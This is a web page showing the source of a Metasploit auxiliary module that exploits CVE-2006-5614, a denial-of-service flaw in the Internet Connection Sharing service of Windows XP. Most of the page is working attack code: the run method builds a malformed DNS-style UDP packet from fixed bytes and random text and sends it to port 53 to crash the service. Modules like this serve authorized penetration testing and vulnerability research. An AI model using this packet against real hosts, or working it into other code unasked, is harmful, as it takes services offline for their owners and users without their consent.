Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/nat/nat_helper.rb
21549 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Udp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Microsoft Windows NAT Helper Denial of Service',
15
'Description' => %q{
16
This module exploits a denial of service vulnerability
17
within the Internet Connection Sharing service in
18
Windows XP.
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'OSVDB', '30096'],
24
[ 'BID', '20804' ],
25
[ 'CVE', '2006-5614' ],
26
],
27
'DisclosureDate' => '2006-10-26',
28
'Notes' => {
29
'Stability' => [CRASH_SERVICE_DOWN],
30
'SideEffects' => [],
31
'Reliability' => []
32
}
33
)
34
)
35
36
register_options([Opt::RPORT(53),])
37
end
38
39
def run
40
connect_udp
41
42
pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
43
pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
44
pkt << Rex::Text.rand_text_english(10) + "\x03"
45
pkt << Rex::Text.rand_text_english(3)
46
pkt << "\x00\x00\x01\x00\x01"
47
48
print_status('Sending dos packet...')
49
50
udp_sock.put(pkt)
51
52
disconnect_udp
53
end
54
end
55
56